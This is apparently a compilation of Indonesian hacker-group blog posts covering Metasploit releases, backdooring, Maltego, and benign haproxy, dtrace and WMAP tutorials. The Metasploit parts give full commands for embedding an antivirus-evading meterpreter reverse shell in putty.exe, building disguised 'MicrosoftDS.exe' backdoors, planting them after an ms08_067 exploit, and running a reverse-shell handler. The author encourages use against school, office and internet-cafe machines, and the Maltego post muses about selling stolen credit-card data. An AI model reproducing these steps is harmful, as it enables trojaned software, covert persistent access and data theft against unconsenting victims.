Kecoak Elektronik Indonesia

.sudah 363 hari sejak release notes metasploit 3.2 beredar,kerja keras dari dev-team ataupun kontribusi dari para freelance, menyebabkan perkembangan framework API berbasis ruby ini cukup pesat,ya spirit of the open source pr0ject-

.beberapa perubahan dalam release kali ini:
– 123 new exploits,117 auxiliary modules.
– dukungan terhadap ruby 1.9.1.
– performance dan stability lebih baik,peningkatan dalam proses startup framework.
– terintegrasi dengan OSVDB, exploit yang memiliki hubungan dengan OSVDB memiliki id referensi.
– compatiblitas terhadap OS 32-bit ataupun 64-bit baik unix,mac OS,windows.
– dukungan untuk JSP payloads, IPV6, NX dan DEP.
– meterpreter mendukung screenshot,keylogger, ataupun packet sniffing.
– msfencode dapat di embedded ke arbitry executables baik itu 32-bit ataupun 64-bit.
.for more info metasploit’s 3.3 release notes.

.masih ingat dengan artikel ini , meterpreter di encode XOR menggunakan shikata_ga_nai, dan lolos dari site virustotal.
.berikut POC dari msfencode embedded to arbitry executables.

.d0tz@k-elektr0nik:/pentest/exploits/framework3$ ./msfconsole

 /         /              /
(___      (___  ___  ___ (     ___  ___
|   )\   )|    |___)|___ |___)|   )|___)|   )
|__/  \_/ |__  |__   __/ | \  |    |__  |/\/
       /

       =[ metasploit v3.4-dev [core:3.4 api:1.0]
+ -- --=[ 448 exploits - 216 auxiliary
+ -- --=[ 262 payloads - 22 encoders - 8 nops
       =[ svn r7564 updated today (2009.11.18)

msf > version
Framework: 3.4-dev.7554
Console  : 3.4-dev.7537

--------------------------------------------

.d0tz@k-elektr0nik:/pentest/exploits/framework3$ ./msfpayload windows/meterpreter/reverse_tcp_allports LHOST=192.168.13.37 LPORT=443 R | ./msfencode -t exe -x /home/d0tz/putty.exe -o /home/d0tz/puttyw00t.exe
[*] x86/shikata_ga_nai succeeded with size 102 (iteration=1)

.hasil scan virustotal 2/41.

.berikut merupakan hasil perbandingan metadata dari putty executable,

.d0tz@k-elektr0nik:/pentest/exploits/framework3$ exiftool -a -u -g1 /home/d0tz/putty.exe
---- ExifTool ----
ExifTool Version Number         : 7.89
---- System ----
File Name                       : putty.exe
Directory                       : /home/d0tz
File Size                       : 444 kB
File Modification Date/Time     : 2009:11:08 22:36:28+07:00
---- File ----
File Type                       : Win32 EXE
MIME Type                       : application/octet-stream
---- EXE ----
Machine Type                    : Intel 386 or later, and compatibles
Time Stamp                      : 2007:04:29 18:43:12+07:00
PE Type                         : PE32
Linker Version                  : 7.10
Code Size                       : 323584
Initialized Data Size           : 155648
Uninitialized Data Size         : 0
Entry Point                     : 0x4777f
OS Version                      : 4.0
Image Version                   : 0.0
Subsystem Version               : 4.0
Subsystem                       : Windows GUI
File Version Number             : 0.60.0.0
Product Version Number          : 0.60.0.0
File Flags Mask                 : 0x000b
File Flags                      : (none)
File OS                         : Win32
Object File Type                : Executable application
File Subtype                    : 0
Language Code                   : English (British)
Character Set                   : Unicode
Company Name                    : Simon Tatham
Product Name                    : PuTTY suite
File Description                : SSH, Telnet and Rlogin client
Internal Name                   : PuTTY
Original Filename               : PuTTY
File Version                    : Release 0.60
Product Version                 : Release 0.60
Legal Copyright                 : Copyright © 1997-2007 Simon Tatham.

------------------------------------------------------------------

.d0tz@k-elektr0nik:/pentest/exploits/framework3$ exiftool -a -u -g1 /home/d0tz/puttyw00t.exe
---- ExifTool ----
ExifTool Version Number         : 7.89
---- System ----
File Name                       : puttyw00t.exe
Directory                       : /home/d0tz
File Size                       : 444 kB
File Modification Date/Time     : 2009:11:18 10:46:17+07:00
---- File ----
File Type                       : Win32 EXE
MIME Type                       : application/octet-stream
---- EXE ----
Machine Type                    : Intel 386 or later, and compatibles
Time Stamp                      : 2007:04:29 18:43:12+07:00
PE Type                         : PE32
Linker Version                  : 7.10
Code Size                       : 323584
Initialized Data Size           : 155648
Uninitialized Data Size         : 0
Entry Point                     : 0x4c511
OS Version                      : 4.0
Image Version                   : 0.0
Subsystem Version               : 4.0
Subsystem                       : Windows GUI
File Version Number             : 0.60.0.0
Product Version Number          : 0.60.0.0
File Flags Mask                 : 0x000b
File Flags                      : (none)
File OS                         : Win32
Object File Type                : Executable application
File Subtype                    : 0
Language Code                   : English (British)
Character Set                   : Unicode
Company Name                    : Simon Tatham
Product Name                    : PuTTY suite
File Description                : SSH, Telnet and Rlogin client
Internal Name                   : PuTTY
Original Filename               : PuTTY
File Version                    : Release 0.60
Product Version                 : Release 0.60
Legal Copyright                 : Copyright © 1997-2007 Simon Tatham.

.ya bisa dilihat, hanya ada perbedaan pada entry point,are this s0 epic guys??

.walaupun berita terakhir announcement rapid7 dan hdmoore mail menyebutkan, metasploit telah di akusisi oleh rapid7 memang ada beberapa persepektif tentang ikut ambilnya rapid7 dalam project ini,positifnya dev-team akan lebih pr0fessional imbasnya metasploit lebih stabil, dan release sebuah exploit pun akan jauh lebih cepet. negatifnya mungkin beberapa fitur yang lebih advance akan dikenakan biaya oleh rapid7 like nessus maybe damn!… [that's just my opinion]

.kita liad saja konsekuensi dari para dev-team ataupun hd-moore apakah tetap menerapkan license 3-clause BSD atau akan mengikuti jejak immunity canvas maupun core-impact yang bersifat komersial.

.last w0rd, welcome metasploit 3.4 dev-

Mungkin sebagian sudah ada yang tahu bahwa metasploit dapat digunakan untuk membuat backdoor, pernah juga disinggung pada toket edisi new year 2009. Penggunaan backdoor ini sangat berguna terutama sebagai post-exploitation method. Pada contoh kali ini kita akan memanfaatkan 2 metode dasar mendapatkan shell dari target, yaitu bind_tcp dan reverse_tcp.

Untuk bind_tcp, backdoor akan dijalankan pada terget dimana target akan membuka port pada sistemnya sendiri. Sehingga setelah proses exploitasi selesai, kita dapat masuk kapan saja ke target dengan memanfaatkan port yang telah dibuka oleh backdoor tersebut.

$ ./msfpayload windows/meterpreter/bind_tcp LPORT=4321 RHOST=10.10.96.143 EXITFUNC=thread X > MicrosoftDS.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/bind_tcp
 Length: 307
Options: LPORT=4321,RHOST=10.10.96.143,EXITFUNC=thread

Backdoor tersebut akan membuka port 4321 pada target 10.10.96.143. Bagaimana proses menjalankan backdoor tersebut terserah kita, bisa jadi backdoor ditanam dan dijalankan setelah proses exploitasi selesai terhadap target seperti berikut:

msf exploit(ms08_067_netapi) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 0 / 1 - lang:English
[*] Selected Target: Windows XP SP0/SP1 Universal
[*] Triggering the vulnerability...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 3 opened (10.10.97.14:31338 -> 10.10.96.143:4780)

meterpreter > cd \
meterpreter > pwd
C:\
meterpreter > upload MicrosoftDS.exe
[*] uploading  : MicrosoftDS.exe -> MicrosoftDS.exe
[*] uploaded   : MicrosoftDS.exe -> MicrosoftDS.exe
meterpreter > execute -f MicrosoftDS.exe -H
Process 2348 created.

Pada saat berikutnya, kita dapat masuk ke mesin target tanpa melakukan exploitasi ulang, cukup dengan membuka koneksi pada port yang telah didefinisikan berikutnya.

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(handler) > set LPORT 4321
LPORT => 4321
msf exploit(handler) > set RHOST 10.10.96.143
RHOST => 10.10.96.143
msf exploit(handler) > exploit

[*] Starting the payload handler...
[*] Started bind handler
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 2 opened (10.10.97.14:58798 -> 10.10.96.143:4321)

meterpreter >

Metode kedua menggunakan reverse shell, reverse shell digunakan terutama apabila network target dibatasi oleh firewall sehingga tidak bisa membuka koneksi ke semua port (tipikal internal network). Jadi jika kalian mendapatkan kesempatan untuk hacking ke salah satu mesin dalam internal network (misal: komputer sekolah, komputer kantor, komputer warnet, etc) serta tetap ingin mendapatkan akses shell tersebut kapanpun dan dimanapun bisa memanfaatkan multi-handler metasploit untuk menerima reverse shell. Kita bisa setup multi-handler di mesin-mesin yang dapat diakses dari manapun di internet, misalnya: mesin hosting, atau mesin server hasil rampokan, dsb.

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > show options

Module options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------  

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  seh              yes       Exit technique: seh, thread, process
   LHOST                      yes       The local address
   LPORT     4444             yes       The local port                        

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target  

msf exploit(handler) > set LPORT 53
LPORT => 53
msf exploit(handler) > set LHOST 222.124.199.76
LHOST => 222.124.199.76
msf exploit(handler) > set ExitOnSession false
msf exploit(handler) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...

Selanjutnya tinggal buat backdoor dengan kategori reverse_shell:

$ ./msfpayload windows/meterpreter/reverse_tcp LPORT=53 LHOST=222.124.199.76 EXITFUNC=thread X > MicrosoftDS.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
 Length: 278
Options: LPORT=53,LHOST=222.124.199.76,EXITFUNC=thread
$ file MicrosoftDS.exe
MicrosoftDS.exe: MS-DOS executable PE  for MS Windows (GUI) Intel 80386 32-bit

Dan ketika dijalankan (dijalankan melalui sesi pasca exploitasi ataupun dijalankan secara manual lewat double-click mouse ), pada multi-handler akan muncul:

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 3 opened (222.124.199.76:53 -> 10.10.96.143:4831)

meterpreter > 

Asyiknya menggunakan multi-handler metasploit adalah kita dapat memiliki banyak sessions sekaligus, untuk contoh diatas dapat dilihat satu multi-handler yang telah diset ExitOnSession==false dapat menghandle banyak reverse_shell sekaligus. Dan kita dapat berinteraksi dengan session-session tersebut kapanpun kita mau:

msf exploit(handler) > sessions -l

Active sessions
===============

  Id  Description  Tunnel
  --  -----------  ------
  3   Meterpreter  222.124.199.76:53 -> 10.10.96.146:4831
  4   Meterpreter  222.124.199.76:53 -> 10.10.96.223:4836
  5   Meterpreter  222.124.199.76:53 -> 10.10.96.215:4838
  6   Meterpreter  222.124.199.76:53 -> 172.16.96.143:4840
  7   Meterpreter  222.124.199.76:53 -> 172.16.96.143:4845
  8   Meterpreter  222.124.199.76:53 -> 172.16.96.143:4846
  9   Meterpreter  222.124.199.76:53 -> 172.16.96.143:4847  

msf exploit(handler) > sessions -i 3
[*] Starting interaction with 3...
meterpreter > sysinfo
Computer: PROGWAR
OS      : Windows XP (Build 2600, ).

Itulah beberapa contoh pemanfaatan metasploit untuk backdooring, masih banyak contoh-contoh kreatif lainnya terutama yang berbau kiddies dan evil-in-mind. Oh iya, pada contoh diatas saya menggunakan payload meterpreter berkali-kali. Pembahasan tentang meterpreter akan dilakukan berikutnya.

Stay tuned *heh, serasa pembawa acara opera sabun*

Seperti biasa, proses instalasi Backtrack sangat-sangat simple terutama bagi para pengguna Gentoo dimana tehnik chroot dan konfigurasi boot loader bukan lagi menjadi hal yang aneh. Instalasi backtrack 4 ke harddisk secara umum dapat dilihat pada forum remote-exploit, sebagai tambahan instalasi Backtrack 4 pada MacBook dapat dilihat pada link ini.

Baru-baru ini paterva mengeluarkan rilis baru untuk maltego. Maltego sendiri pernah dibahas tahun lalu disini. Ada cukup banyak improvement yang dilakukan oleh team Roelof Tammingh dalam penyempurnaan Maltego.

Pada awalnya maltego merupakan tools simple untuk mencari hubungan antar objek seperti yang dijelaskan pada blog kecoak sebelumnya. Namun saat ini sudah proses discovery tidak terbatas pada hal-hal infrastruktur saja, namun sudah meliputi pen-testing hingga malware discovery. Ambil contoh kita memasukan object services berupa apache port 80, dengan transform untuk penetration testing akan ditemukan berbagai informasi yang berkaitan dengan apache port 80 ini, misalnya: listing exploit. Untuk malware transform kita juga akan sering mendapatkan hal-hal menarik, misalnya visualisasi sudah sejauh mana suatu malware menginfeksi korbannya, gambaran target dari daerah mana saja, malware tersebut berasal dari mana saja, dsb.

Hanya saja sayangnya beragam feature menarik tersebut tersedia pada commercial edition dimana kita harus mengeluarkan lebih dari $400 untuk licensenya. Tersedia community edition namun transform yang disediakan sangat terbatas, jadi jangan mengharapkan bisa melakukan discovery pen-testing jika hanya menggunakan community edition.

Diantara feature-feature baru yang hadir di rilis Maltego 2.0.2 ada satu feature yang menurut saya pribadi sangat berguna, dan ini bisa diakses walaupun hanya menggunakan community edition, yaitu local transform. Pada situs maltego terdapat spesifikasi untuk membuat local transform, gampangnya adalah kita bisa membuat suatu private transform sendiri (mis: input berupa nama seseorang dan outputnya adalah data berdasarkan informasi penduduk di Indonesia) dan hasilnya di visualisasikan dengan menggunakan Maltego, ataupun di jointkan hasilnya dengan hasil transform lain untuk mendapatkan informasi yang lebih banyak (mis: dari input nama, dapat alamat rumah, dapat website yang dikunjungi apa saja, dapat informasi kepemilikan account, dsb).

Pemanfaatan local transform menurut saya bisa jauh lebih ‘fun and profit’. Ambil contoh suatu kelompok berhasil masuk ke berbagai sistem dengan skill hackingnya, dan kelompok ini lebih tertarik untuk mengumpulkan beragam informasi yang dapat ditemukan pada sistem tersebut dibandingkan melakukan mass deface dengan memasang foto misterius yang diambil saat senja disuatu tempat hiburan dan dipamerkan pada media massa. Mereka melakukan kompilasi informasi-informasi tersebut pada format tertentu, meletakan nya pada suatu server, dan membuat local transform untuk menerima input dari via maltego yang kemudian memproses dan mengeluarkan hasil outputnya kembali via maltego dengan menggunakan database hasil hacking diatas.

Not clear enough?!data yang diambil bisa jadi kartu kredit, informasi email, alamat detail, jumlah anak, nama keluarga, data simpan pinjam, dsb. Yang tentu saja tidak terpublish di google (walaupun mungkin saja ada yg terpublish) dan tersimpan rapi pada suatu sistem. Atau bisa juga database berupa profile para peserta underground, hasil sniff dari forum-forum ataupun dari irc, yang kemudian di kompile dan di jual pada pemerintah. Pengguna tinggal memanfaatkan maltego untuk profiling seseorang atau suatu perusahaan dan suatu pihak dapat menjual private local transform tersebut dengan harga tertentu yang hasilnya dapat dilihat langsung melalui maltego.

Informasi maltego yang resmi dapat dilihat lebih lengkap pada situsnya.

Untuk yang belum tahu, distro security dari remote-exploit yang sangat populer akan mengeluarkan rilis terbarunya. Sepertinya sekarang ini para white-hat memang sangat gemar sekali menjadikan ajang security conference sebagai media PR, atau produk security hasil research yang dijadikan alat PR suatu security conference?well, yang pasti berdasarkan muts backtrack4 beta akan dapat segera di download setelah shmoocon berakhir.

In the other corner, pentoo, yang saat awal-awal distro security menjadi trend dikalangan security beberapa tahun lalu juga ikut menyumbangkan distro security berbasis Gentoo Linux, berencana untuk mengeluarkan rilis terbarunya dalam waktu dekat. Saya sendiri cukup kecewa karena pentoo tidak pernah terupdate lagi sejak rilis terakhirnya sekitar 2-3 tahun yang lalu, walaupun tidak sepopuler ataupun sematang backtrack namun kehadiran pentoo menjadi favorite tersendiri terutama bagi para pecinta gentoo.

Let see feature-feature baru apa saja yang muncul di distro-distro terbaru ini, feature GPU cracking sepertinya cukup membuat penasaran

UPDATE: download versi alpha pentoo disini. Dilihat sekilas, tidak banyak perbedaan dengan Backtrack versi lama, cukup kecewa dengan penanganan resolusi layarnya di MacBook via VMware .

Load balancing (LB) adalah salah satu technology yang udah cukup lama, namun tidak cukup familiar di kalangan IT itu sendiri,padahal hampir sebagian besar site-site yang memiliki traffic tingkat tinggi pasti menggunakan teknologi LB untuk membagi beban ke server atau cluster yang mereka miliki. berikut ini adalah contohnya:

%host -t a www.detik.com
www.detik.com is an alias for detik.com.
detik.com has address 202.158.66.94
detik.com has address 203.190.241.41
detik.com has address 203.190.241.43
detik.com has address 202.158.66.190
detik.com has address 202.158.66.86
detik.com has address 203.190.241.166
detik.com has address 202.158.66.20

%host -t a www.google.co.id
www.google.co.id is an alias for www.google.com.
www.google.com is an alias for www.l.google.com.
www.l.google.com has address 66.249.89.104
www.l.google.com has address 66.249.89.147
www.l.google.com has address 66.249.89.99

Okey, 2 contoh diatas cukup memberi gambaran bahwa kedua site tersebut menggunakan teknologi balancing. Untuk definisi LB itu sendiri bisa dibaca disini. LB memiliki beberapa algoritma atau metode dalam membagi beban ke server atau cluster yang mereka miliki:

1. DNS Load Balancing
Metode ini menggunkan sebuah domain name yang menunjuk ke-beberapa IP publik sekaligus, silahkan baca disini untuk keterangan lebih lanjut

2. Random Allocation
Ini adalah algoritma random, tidak ada yang perlu dijelaskan lebih lanjut, karena algoritma ini membagi beban ke server secara random tanpa ada sebuah pola yang jelas.

3. Round Robin
Round robin membagi incoming request secara rotasi, jadi misalkan ada 3 server yang menjadi anggota dari sebuah cluster, ketika ada request pertama, maka server A yang akan menghadle-nya, request kedua Server B, request ketiga server C. Kemudian ketika ada request ke-4 maka itu akan dirotasi lagi ke server A kemudian request ke-lima akan diberikan ke server B, begitu seterusnya. selengkapnya bisa anda baca disini

4. Weighted Round-Robin Allocation
Algoritma ini adalah pengembangan dari algoritma round robin, sedikit perbedaannya adalah algoritma ini bisa membagi beban lebih tinggi ke server atau cluster yang memiliki resource yang lebih besar

Ada banyak aplikasi maupun hardware yang bisa menjalankan teknologi LB. Cisco, F5, Barracuda, dan Juniper adalah beberapa vendor yang menyediakan dedicated hardware untuk service LB. Sementara itu untuk software, anda bisa melihatnya disini
Diantara beberapa aplikasi LB, salah satu yang cukup menarik bagi saya adalah haproxy, karena selain ringan, juga cukup mudah dalam penggunaannya. Mari kita coba menjalankan haproxy dengan kasus sederhana. Saya menggunakan system OpenBSD sebagai mesin load balancer.

Saya mem-build haproxy dari ports:

# uname -a
OpenBSD k-elektronik 4.4 GENERIC#0 i386
# cd /usr/ports/net/haproxy/
# cat distinfo
MD5 (haproxy-1.3.15.2.tar.gz) = pk1/WnRk52n4Z2gCvo6PNg==
RMD160 (haproxy-1.3.15.2.tar.gz) = YHMIoB0/Y/d6x65m00Krml6Ikn8=
SHA1 (haproxy-1.3.15.2.tar.gz) = LRPN8fhog+eFcffPI4qb+MAupC8=
SHA256 (haproxy-1.3.15.2.tar.gz) = YgK8PuWbtVe+WsgMfKQrOUnaBL0plx4395HSdxwOQmQ=
SIZE (haproxy-1.3.15.2.tar.gz) = 501219
# make install clean
# /usr/local/sbin/haproxy -v
HA-Proxy version 1.3.15.2 2008/06/21
Copyright 2000-2008 Willy Tarreau

untuk konfigurasi dengan 2 server farm, minimal file config haproxy terlihat seperti berikut:

# cat haproxy.conf
global
log 127.0.0.1   local0
log 127.0.0.1   local1 notice
maxconn 1024
ulimit-n 65536
daemon
nbproc      8 # Number of processing cores

defaults
mode            http
log             global
option          httplog
option          dontlognull
clitimeout      180000
srvtimeout      180000
contimeout      100000
retries         15
option          redispatch
option          httpclose
option          abortonclose
option          httpchk

listen  http_main 11.11.11.11:80 # bukan IP sebenarnya 
option httpclose
option forwardfor
cookie apaaja insert indirect nocache
option httpchk /http_check.html
balance roundrobin # Load Balancing algorithm

server server01 192.168.1.1:80 check inter 2000 rise 2 fall 5
server server02 192.168.1.2:80 check inter 2000 rise 2 fall 5

sebelum menjalankan haproxy, pastikan bahwa kedua webserver anda telah jalan dengan baik

#/usr/local/sbin/haproxy -f /usr/local/etc/haproxy.conf
# ps xw | grep haproxy | head -n 1
845  ??  Ss     0:52.58 /usr/local/sbin/haproxy -p /var/run/haproxy.pid -f /usr/local/etc/haproxy.conf

banyak sekali hal menarik yang anda bisa lakukan dengan haproxy, silahkan baca disini, dan juga ini untuk pendalaman lebih lanjut. For security..?!hhmm, i will post it again later.

salam,

jackD

Proses tracing adalah salah satu bagian penting dari task seorang administrator sistem, melihat proses yang sedang berjalan, idle atau yang lainnya akan sangat membantu dalam proses pengaturan sistem itu sendiri. Banyak tools tracing yang tersedia, seperti ktrace, strace dan yang lainnya. Salah satu yang cukup powerfull bagi penulis adalah dtrace. Dtrace adalah sebuah tools yang datang dengan berbagai fungsi dan kegunaan yang sangat membantu proses tracing yang dibuat oleh SUN dan menjadi bagian dari sistem operasi SunOS maupun OpenSolaris. Salah satu feature yang sangat menarik dari dtrace adalah penggunaan D language sebagia scripting language buat dtrace itu sendiri.
FreeBSD sebagai salah satu sistem “Unix like” ikut memanfaatkan penggunaan dtrace sebagai salah satu tracing tool. Bagi para pengguna sistem ini, perlu sedikit modifikasi terhadap kernel, apabila ingin menggunakannya. Berikut langkah-langkah penggunaan dtrace di dalam sistem FreeBSD:

Pada langkah pertama saya menambahkan beberapa options untuk penggunaan dtrace, kemudian melakukan compile ulang pada kernel FreeBSD saya dengan option WITH_CTF (C Type Format).

k-elektronik# uname -sr
FreeBSD 7.1-RELEASE-p2
k-elektronik# cd /usr/src/sys/i386/conf/
k-elektronik# tail -n 2 K-Elektronik
options         KDTRACE_HOOKS
options         DDB_CTF
k-elektronik# cd /usr/src/
k-elektronik# make WITH_CTF=1 buildkernel KERNCONF=K-Elektronik
k-elektronik# make WITH_CTF=1 installkernel KERCONF=K-Elektronik
k-elektronik# reboot

Langkah kedua, saya meload module dtraceall ke-dalam kernel FreeBSD, jika ingin melakukan secara otomatis setiap kali ketika sistem boot, edit file /boot/loader.conf.

k-elektronik# kldload dtraceall
k-elektronik# kldstat
Id Refs Address    Size     Name
1   12 0xc0400000 990bb8   kernel
2    1 0xc0d91000 20d8     dtraceall.ko
3    4 0xc0d94000 3f98     cyclic.ko
4    9 0xc0d98000 23cc     opensolaris.ko
5    7 0xc0d9b000 ba188    dtrace.ko
6    2 0xc0e56000 26d8     dtmalloc.ko
7    2 0xc0e59000 456c     fbt.ko
8    2 0xc0e5e000 2788     sdt.ko
9    2 0xc0e61000 e340     systrace.ko
10    2 0xc0e70000 33b0     profile.ko
11    1 0xc0e74000 6a2c4    acpi.ko

k-elektronik# cat /boot/loader.conf
dtraceall_load="YES"

Seperti terlihat diatas, module dtrace telah di load oleh kernel, untuk mencobanya, buat script sederhana seperti dibawah ini:

k-elektronik# cat counter.d
dtrace:::BEGIN
{
i = 10;
}

profile:::tick-1sec
/i > 0/
{
trace(i--);
}

profile:::tick-1sec
/i == 0/
{
trace("blastoff!");
exit(0);
}

k-elektronik# dtrace -s counter.d
dtrace: script 'counter.d' matched 3 probes
CPU     ID                    FUNCTION:NAME
0  33203                       :tick-1sec        10
0  33203                       :tick-1sec         9
0  33203                       :tick-1sec         8
0  33203                       :tick-1sec         7
0  33203                       :tick-1sec         6
0  33203                       :tick-1sec         5
0  33203                       :tick-1sec         4
0  33203                       :tick-1sec         3
0  33203                       :tick-1sec         2
0  33203                       :tick-1sec         1
0  33203                       :tick-1sec   blastoff!

Dtrace sendiri banyak memiliki fungsi-fungsi yang bisa anda gunakan untuk keperluan tracing, dokumentasinya bisa anda baca disini,

k-elektronik# dtrace -l | more
ID   PROVIDER            MODULE                          FUNCTION NAME
1     dtrace                                                     BEGIN
2     dtrace                                                     END
3     dtrace                                                     ERROR
4   dtmalloc                                          madt_table malloc
5   dtmalloc                                          madt_table free
6   dtmalloc                                             acpidev malloc
7   dtmalloc                                             acpidev free
8   dtmalloc                                                 fbt malloc
9   dtmalloc                                                 fbt free
10   dtmalloc                                              apmdev malloc
11   dtmalloc                                              apmdev free
k-elektronik# dtrace -l | wc -l
33204

Ok, Selamat bereksplorasi dengan dtrace di FreeBSD!

Salam,

jackD

Mungkin masih ada yang belum tahu bahwa metasploit saat ini mendukung cukup banyak feature, salah satunya adalah wmap. WMAP merupakan web application framework yang digunakan untuk proses scanning suatu website dengan memanfaatkan metasploit framework. WMAP sendiri masih terbilang baru sehingga masih banyak hal-hal yang belum ditambahkan, proses scanning pun masih dilakukan dengan cara sederhana namun konsepnya cukup baik sehingga kita dapat ikut melakukan kustomisasi terhadap modul-moudul yang akan digunakan.

Dokumentasi mengenai WMAP dapat ditemukan pada paket Metasploit, atau bisa dilihat langsung secara online disini. Dan seperti biasa, kita akan mulai pembahasan dari konsep hingga implementasi.

Bagi kalian yang terbiasa melakukan audit ataupun scanning terhadap suatu aplikasi web pasti sudah terbiasa dengan istilah spider. Web scanner umumnya memiliki kemampuan untuk mengumpulkan informasi sebanyak-banyaknya dari target melalui seluruh link yang ditemukan mulai dari halaman index hingga halaman-halaman terdalam lainnya. Web scanner tersebut akan melakukan audit terhadap link-link yang ditemukan dan dicocokan hasilnya dengan informasi vulnerability dalam database tools tersebut. WMAP pada metasploit bekerja dengan metode yang mirip namun memanfaatkan aplikasi-aplikasi opensource.

WMAP merupakan salah satu plugin (yup, salah satu, masih ada beberapa plugin lainnya) metasploit yang dapat di load pada msfconsole dimana melalui msfconsole tersebut user dapat berinteraksi dengan metasploit framework. Berikut ini konsep WMAP pada metasploit:

1. RatProxy

Metasploit memanfaatkan RatProxy sebagai proxy yang akan menangkap seluruh data request-response antara web client dengan web server. Informasi tersebut akan dimasukan ke suatu database (sqlite3) untuk kemudian digunakan oleh modul-modul WMAP. RatProxy sendiri merupakan hasil karya hacker Michal Zalewski yang merupakan opensource tools untuk audit web application. RatProxy tidak memiliki dukungan terhadap penyimpanan data kedalam bentuk database, oleh karena itu sebelum dapat digunakan oleh WMAP maka RatProxy harus di-patch terlebih dahulu. Patch bisa didapatkan dari bundle metasploit: external/ratproxy/ratproxy_wmap.diff

2. SQLite3

SQLite merupakan produk database yang diklaim small, fast, reliable. SQLite umumnya digunakan oleh aplikasi-aplikasi yang membutuhkan database sebagai tempat penyimpanan dan pemrosesan data yang sederhana. Contoh penggunaannya adalah pada iPhone dimana sqlite digunakan untuk menyimpan data SMS. Metasploit sendiri memiliki driver yang dapat berkomunikasi dengan 3 produk database, MySQL, PostgreSQL, dan SQlite3. Implementasi WMAP memanfaatkan SQLite3.

3. WMAP

WMAP merupakan plugin metasploit untuk web application framework audit. Saat tulisan ini dibuat versi stable metasploit adalah 3.2, dan modul-modul yang dapat digunakan oleh WMAP antara lain: WMAPScanServer, WMAPScanDir, WMAPScanUniqueQuery, dll.

Jika kalian menggunakan Backtrack 3 final, maka support terhadap metasploit sudah sangat baik. Requirement yang dibutuhkan oleh metasploit telah terpenuhi dan plugin-pluginnya dapat di-load dengan mudah. Namun beberapa sistem operasi lain umumnya membutuhkan beragam metode sebelum dapat memanfaatkan feature-feature pada metasploit framework. Untuk plugin WMAP ini, seperti yang telah disebutkan diatas, dibutuhkan RatProxy dan SQlite3 berjalan dengan baik sebelum me-load WMAP. Pada contoh dibawah ini saya menggunakan sistem operasi OS X yang membutuhkan beberapa data tambahan untuk memuaskan persayaratan yang dibutuhkan oleh WMAP, diantaranya yang terpenting dibutuhkan flare khusus (bukan bawaan dari RatProxy) yang kompatibel dengan MacOSX. Flare merupakan tools yang digunakan untuk proses decompiler action script flash.

(1). Buat database wmap_test.db melalui plugin database metasploit

msf > db_create /Users/staff/wmap_test.db
[*] Creating a new database instance...
[*] Successfully connected to the database
[*] File: /Users/staff/wmap_test.db

(2). Bagi kalian yang memiliki rasa penasaran tinggi tentu ingin melihat seperti apa bentuk database yang dibuat oleh plugin database metasploit tersebut. Database yang telah dibuat dapat kita lihat schema-nya secara langsung menggunakan SQLite.

k-elektronik:~ staff$ sqlite3 wmap_test.db
SQLite version 3.4.0
Enter ".help" for instructions
sqlite> .tables
hosts       refs        requests    targets     vulns_refs
notes       reports     services    vulns
sqlite> .schema requests
CREATE TABLE requests (
'host' VARCHAR(20),
'port' INTEGER,
'ssl' INTEGER,
'meth' VARCHAR(20),
'path' BLOB,
'headers' BLOB,
'query' BLOB,
'body' BLOB,
'respcode' VARCHAR(5),
'resphead' BLOB,
'response' BLOB,
'created' TIMESTAMP
);

(3). Setelah urusan database selesai, maka selanjutnya menjalankan aplikasi RatProxy yang sebelumnya telah di-patch agar dapat menyimpan seluruh data request-response ke database wmap_test.db

k-elektronik:ratproxy staff$ ./ratproxy -v /Users/staff/ -b wmap_test.db -d detik.com -xtifkgmjscael2XCr
ratproxy version 1.51-beta by 
[*] Proxy configured successfully. Have fun, and please do not be evil.
WARNING: Disruptive tests enabled. use with care.
[+] Accepting connections on port 8080/tcp (any source)...

(4). RatProxy diatas menggunakan port default, yaitu 8080. Yang berarti pada mesin tersebut dibuka port 8080 dan akan bertindak sebagai proxy server. Sisanya adalah kita melakukan browsing secara manual ataupun menggunakan automatic tools dengan memanfaatkan port 8080 itu sebagai proxy server. Hasil dari browsing seluruhnya akan di log oleh RatProxy kedalam database wmap_test.db

(5). Sekali lagi, bagi yang penasaran apakah RatProxy benar-benar menyimpan hasilnya pada database yang telah kita buat sebelumnya, dapat memanfaatkan sqlite3.

sqlite> select host,meth,headers from requests;
202.158.66.94|GET|User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Cookie: __utma=146380193.1809118446.1213005860.1213005860.1213005860.1
Connection: keep-alive
Proxy-Connection: keep-alive
Host: detik.com

